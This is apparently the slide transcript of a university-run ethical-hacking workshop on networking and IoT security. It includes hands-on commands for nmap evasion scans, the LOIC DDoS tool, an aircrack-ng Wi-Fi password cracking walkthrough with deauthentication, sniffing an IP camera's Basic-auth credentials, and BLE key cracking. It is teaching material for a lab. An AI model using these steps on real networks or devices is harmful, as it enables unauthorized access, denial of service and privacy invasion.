Jing Hui, Ivan, Syuqri and Claudia...•Exercise 1 –Wireshark 1. Observe network traffic 2. Find...
Transcript of Jing Hui, Ivan, Syuqri and Claudia...•Exercise 1 –Wireshark 1. Observe network traffic 2. Find...
Prepared by:
Jing Hui, Ivan, Syuqri and Claudia
1
Acknowledgement
IMPORTANTiTrust acknowledges that any and all software and/or tools presented in this workshop are the sole property of their respective trademark / registered / copyright owners.
2
Warning !
Please do not use the tools provided for unethical purposes.
3
4
Time Agenda
9.00 – 9.30am Introduction to iTrust and the Internet of Things (IoT)
9.30 – 10.30am Introduction to Networking
10.30 – 10.45am Break
10.45 – 12.30am Ethical Hacking and Cyber Security
12.30 – 1.30pm Lunch
1.30 – 3.30pm Compromising IoT Devices 1
3.30 - 345pm Break
3.45 – 4.45pm Compromising IoT Devices 2
4.45 – 4.55pm Closing
4.55 – 5.25pm Tour of iTrust labs
5.25 – 5.30pm Workshop evaluation
Who are we?
5
Funding Focus Areas
CPS Enterprise Security IoT
Collaborators
Distinctive Values
Section 1Before We Start….
6
Cyber Security Considerations
7
Infrastructure (e.g. banking, energy, water, transport)
Company (e.g. wireless vulnerability, secured networks)
Personal (e.g. data privacy, cybercrime)
Introduction to IoT
• What is IoT ?
The internet of things (IoT) is the network of physical devices, vehicles, buildings and other items—embedded with electronics, software, sensors, actuators, and network connectivity that enable these objects to collect and exchange data.
Compromised IoT devices
IoT - Problems
• Additional attack vectors for hackers to compromise.
• As this is something relatively new, no proper methods or standards for securing such device.
• When talking about IoT security, should we be concern about the privacy issues as well ?
Section 2Networks
11
http://25ffhnaechrbzwf3.onion/
Network – LAN / WAN
13
Network – LAN / WAN
14
Network – IP / MAC Address
15
Network – IP / MAC Address
16
How the internet works
17
OSI 7 Layers
18
OSI 7 Layers
19
Types of Protocol
20
What is a Wireless
• Wireless networking is a method by which homes, telecommunications networks and enterprise (business) installations avoid the costly process of introducing cables into a building, or as a connection between various equipment locations.
21
Types of wireless transmissionThere are 3 different ranges for wireless transmission
Short-range
• Infrared
• Bluetooth
Medium-range
• 802.11a/b/g/n/AC
Long-range
• Worldwide Interoperability for Microwave Access or WiMAX
• Global System for Mobile Communications or GSM
22
Wireshark
• Wireshark is a network packet/protocol analyzer.
• A network packet analyzer will try to capture network packets and tries to display that packet data as detailed as possible.
23
• Exercise 1 – Wireshark1. Observe network traffic
2. Find the 3 way handshake
3. Dissect the skype pcap file to see what information can one find
Summary
• What is a LAN/WAN ?
• Components of a network
• How does the internet function ?
• Wireless communication and monitoring
• Wireshark
Section 3Introduction To Ethical Hacking
26
Introduction To Ethical Hacking
27
Hacking Phases
28
Cyber Kill Chain
29
Objectives of Reconnaissance
30
Types of Scanning
31
Scanning – nmap (Hands-on)
• Nmap (nmap.org)• AdminR privilege – ICMP ping sweep, ARP ping, ICMP TIMESTAMP message & TCP
ping @ port 80 & 443 • Non-AdminR privilege – TCP ping only
• -sn : skip port scanning• -PE : skip ARP resolution• --send-ip <IP Addr> : only for same segment else ignore• e.g. : nmap –sn –PE –send-ip x.x.x.x
Caution : IDS monitoring (e.g. Snort – snort.org)
32
Scanning – nmap (Hands-on)
• Nmap (nmap.org)• Hybrid-type of attack (ARP, ICMP & TCP)• e.g. nmap –Pn –sS –p 22 –open x.x.x.x/24
• -Pn : ignore host discovery, scan default 1,000 common ports• -sS –p 22 –open : only output hosts that have port 22 open• x.x.x.x/24 : network segment identity
Caution : Scanning large numbers of ports is dangerous
33
• Nmap (nmap.org)• -oG : tab-delimited output file• -oX : XML output file• -oA : all formats output file• -f : fragment the packets (to avoid simple packet-filtering device/IDS)• -D : decoy (decoy addr must be alive, otherwise SYN-flood & DOS conditions)• e.g.
• Nmap –sF x.x.x.x/24 –oN outputfile• nmap –sS x.x.x.x –D y.y.y.y
Caution : Sophisticated/modern packet-filtering devices & application-based firewall will queue all IP fragments
Scanning – nmap (Hands-on)
34
Denial of Service (DOS) Attack
35
Symptoms of DOS Attack
36
Unavailability of website
Inability to access any website
Unusual slow network performance
Dramatic increase in email spams
Type of DOS / DDOS
37
Volume Based AttacksIncludes UDP floods, ICMP floods, and other spoofed-packet floods. The attack’s goal is to saturate the bandwidth of the attacked site, and magnitude is measured in bits per second (Bps).
Protocol AttacksIncludes SYN floods, fragmented packet attacks, Ping of Death, Smurf DDoS and more. This type of attack consumes actual server resources, or those of intermediate communication equipment, such as firewalls and load balancers, and is measured in Packets per second.
Application Layer AttacksIncludes Slowloris, Zero-day DDoS attacks, DDoS attacks that target Apache, Windows or OpenBSD vulnerabilities and more. Comprised of seemingly legitimate and innocent requests, the goal of these attacks is to crash the web server, and the magnitude is measured in Requests per second.
DDOS Attack (Case Study)
38
DDOS Attack (Case Study)
39
DDOS Attack Tools
• LOIC - Low Orbit Ion Canon (sourceforge.net/projects/loic/)
• XOIC (sourceforge.net/projects/xoic/)
• HULK - HTTP Unbearable Load King (packetstormsecurity.com/files/112856/HULK-Http-Unbearable-Load-King.html)
• DDOSIM - Layer 7 DDOS Simulator (sourceforge.net/projects/ddosim/)
• R-U-Dead-Yet (code.google.com/p/r-u-dead-yet/)
• TOR’s Hammer (packetstormsecurity.com/files/98831/)
40
DDOS Hands-On
LOIC - Low Orbit Ion Canon
41
Understanding Malwares
Virus. A computer virus attaches itself to a program or file enabling it to spread from one computer to another, leaving infections as it travels.
Worm. A sub-class of a virus. It has the capability to travel without any human action. A worm takes advantage of file or information transport features on your system, which is what allows it to travel unaided.
Trojans. Malicious code to cause serious damage by deleting files and destroying information on your system. It can create a backdoor on your computer that gives malicious users access to your system, possibly allowing confidential or personal information to be compromised. Does not reproduce or self-replicate.
A blended threat is a more sophisticated attack that bundles some of the worst aspects of viruses, worms, Trojan horses and malicious code into one single threat. (APT)
42
Advanced Persistent Threat (APT)
• An advanced persistent threat (APT) is a network attack in which an unauthorized person gains access to a network and stays there undetected for a long period of time. The intention of an APT attack is to steal data rather than to cause damage to the network or organization. APT attacks target organizations in sectors with high-value information, such as national defense, manufacturing and the financial industry.
43
Data Exfilitration Using Advanced Techniques
https://www.youtube.com/watch?v=RChj7Mg3rC4
Summary
• Cyber kill chain
• Nmap
• What is a botnet, DDoS ?
• Malware classification
• APTs and how do they steal data from an organization
Section 4Introduction To Cyber Security
46
Encryption
47
Encryption
• What is encryption ?
48
Caesar’s Cipher
• Each letter is replaced by a letter some fixed number of positions down the alphabet.
Encryption• Take for example, the encryption algorithm known as AES allows for
keys up to 256 bits.
• The formula for counting key spaces as such
Number of keys =2𝑥
Where X equals to the number of bits
• Let us take for an example, an RSA algorithm with 2048 bits
• The decimal representation will be, 3.231700607131100730071487668867𝑒616
50
Symmetric Encryption• All algorithms of the symmetric variety use a SINGLE key to encrypt
and decrypt information.
• In traditional cryptographic systems, the same key is used by the sender and receiver to both encrypt and decrypt the message.
• Some of the more common algorithms used are, 3DES, AES and Blowfish.
51
Asymmetric Encryption
52
RSA Algorithm
53
In RSA, this asymmetry is based on the practical difficulty of factoring the product of two large prime numbers
Key Signing Exercise
• https://www.cs.drexel.edu/~introcs/Fa11/notes/10.1_Cryptography/RSAWorksheetv4d.html - asymmetric
• https://encipher.it/ - symmetric
54
Hashing
• Difference between encryption and hashing ?
55
Password Cracker
Hands-onHash Generator
56
Salting
57
Salting
• In cryptography, a salt is random data that is used as an additional input to a one-way function that hashes a password or passphrase. The primary function of salts is to defend against dictionary attacks versus a list of password hashes and against pre-computed rainbow table attacks.
58
In Conclusion
IS ENCRYPTION ENOUGH ?!Reuters reported in December that the NSA had paid RSA $10 million to make a now-discredited cryptography system the default in software used by a wide range of Internet and computer security programs. The system, called Dual Elliptic Curve, was a random number generator, but it had a deliberate flaw - or "back door" - that allowed the NSA to crack the encryption.
59
Summary
• Encryption, symmetric and asymetric
• Hashing
• Difference between encryption and hashing
• Brute force attacks, dictionary attacks and pass the hash
Section 5The Internet of Not Really Secure Things
61
Top 10 vulnerabilities for IoT
Communications in IoT
WiFi Recap
• 802.11 Standard
• Suitable for long range communication
• Now, let’s discuss about its security…
Security concerns for Wifi
• WEP
• WPA
• WPA2
Bluetooth
• Short-wavelength UHF radio waves in the ISM band from 2.4 to 2.485 GHz
• Communicate with a maximum of seven devices in a piconet (an ad-hoc computer network using Bluetooth technology)
• Key pairing mechanisms
Security concerns for Bluetooth
• Prior to Bluetooth v2.1, encryption is not required and can be turned off at any time
• Key pairing mechanism can be sniffed and decrypted easily
IP Camera Exercise
Objectives
• Get access into the network
• Identify the IP camera that has been assigned (via MAC address)
• Identify traffic that is essential for getting access to IP camera’s stream
What is a MAC address?
• Media access control address, also called a physical address
• Unique identifier assigned to network interfaces for communications on the physical network segment
• OUI – Organizationally Unique Identifier
• Purchased by a vendor/manufacturer and assigned by Institute of Electrical and Electronics Engineers (IEEE)
OUI
00:1B:2F:BB:4C:98
Cracking Wi-Fi password
Step 0
• Type ifconfig to find the wireless interface name ie wlan*
• Navigate to appropriate directory in the terminal• cd Desktop > cd Scy\ Phy/ > cd Wi\ Fi/
• This will navigate it into the Scy Phy > Wi Fi folder
Step 1 – Starting monitor mode
• You are required to sniff the wireless traffic to determine which network do you want to gain access to.
• For wireless networks, we will be using a suite of tools called Aircrack-ng.
• To go into monitor mode, use the command ‘sudo airmon-ng start XXX’ where XXX is the interface which you would like to use.
Step 2 – Identify MAC address of AP
• Use the airodump-ng command in the terminal• Command: sudo airodump-ng <interface name>
• This will show you a list of available access points and their respective MAC address
• Do take note of the MAC address of the target access point -(AndroidAP)
Step 3 – Capturing packets using airodump
• Firstly, navigate to a folder of choice to store the captured packets• Example: cd Desktop
• Use the airodump-ng command in the terminal as follows• sudo airodump-ng -c <channel> --bssid <MAC address of AP> -w <name of output file>
<interface name>
• This will start a capture of packets on the access point
Step 4 – Deauthentication using aireplay
• This will prompt a reconnection of a target device to the network• Why do we want to do this?
• Use the command as follows• sudo aireplay-ng -0 1 -c <MAC of target device> -a <MAC of AP> -e <Access point name> <interface name> --ignore-
negative-one
• This will deauthenticate the target device and make it reconnect to the access point.
Step 5 – Deauthentication using aireplay
• This will prompt a reconnection of a target device to the network• Why do we want to do this?
• Use the command as follows• sudo aireplay-ng -0 1 -c <MAC of target device> -a <MAC of AP> -e <Access point name> <interface name> --ignore-
negative-one
• This will deauthenticate the target device and make it reconnect to the access point.
• Do the deauthentication attack multiple times to ensure that a four-way handshake is captured
Step 6 – Cracking password using aircrack
• This will be done using a dictionary attack• Do you remember what a dictionary attack is?
• Use the command as follows• sudo aircrack-ng -w <password list file> -b <MAC of access point> <name of .cap file you have saved>
• If the cracking is successful, a password can be seen in the terminal window
• Congratulations on cracking the password!
Hacking IP Camera
Step 1 – Nmap scan on network
• Use Nmap to do a quick scan on the network• nmap –T4 –F 192.168.0.0/24
• Identify target MAC address• B0:C5:54:xx:xx:xx
• Take note of the ports and services as well
Sample Nmap quick scan output
What is RTSP?
• Real Time Streaming Protocol (RTSP)
• Network control protocol designed for use in entertainment and communications systems to control streaming media servers
• The protocol is used for establishing and controlling media sessionsbetween end points.
Step 2 – Sniffing traffic using Wireshark
• Use Wireshark to sniff traffic• Filter traffic based on IP address
• ip.addr == 192.168.0.xxx
• Get useful information from traffic• Hint: Remember Nmap ports and services?
Sample Wireshark capture
Step 3 – Understanding the HTTP stream
• In the stream, you should notice that there is something called “Authorization: Basic ……”
• HTTP Basic authentication (BA) implementation is the simplest technique for enforcing access controls to web resources because it doesn't require cookies, session identifiers, or login pages; rather, HTTP Basic authentication uses standard fields in the HTTP header, obviating the need for handshakes.
• Usually, the string of data is usually Base 64 encoded.
Step 3 – Accessing camera’s settings
• Input IP address into web browser• Example - 192.168.0.xxx
• This should prompt a login popup
• Verify success of prior procedures by keying in log in details
Step 4 – Figuring out what else we can do
• Remember the results of the Nmap scan?
• What other protocols or services are there?
Discussion
• Defence techniques ?
• How can one mitigate the attacks we just performed ?
Password Guidelines
• The longer the password, the harder it is to crack
• Always use a combination of characters, numbers and special characters
• Variety in passwords
• What to avoid while selecting your password• dictionary word
• easy to guess names and numbers
• sequence or repeated characters
• worst password list (password, 123456, 111111, iloveyou, etc)
• Question: Longer or complex better?
87
Password Guidelines
Fitbit
• Used to use unencrypted communication channel
• Synchronizes automatically with the mobile device over BLE
• So what does all this translate to for an attacker ?
Fitbit exercise
• Convert the fitbit.psd to fitbit.pcap using tibtle2pcap.py
• Dowloadable from https://github.com/joswr1ght/tibtle2pcap
• python tibtle2pcap.py fitbit.psd output.pcap
• wireshark output.pcap
Crackle – Tool for cracking BLE pairing keys
• Cracks BLE key exchange
• Exploits a flaw in the pairing mechanism
• Brute force the TK and derive all further keys
• Can even obtain the LTK
• Decrypt the entire communication
Discussion
• Privacy issues ?
• How can an activity tracker be better designed ?
Conclusion
• Thoughts on IoT
• Security and privacy concerns brought by IoT
• Next gen malwares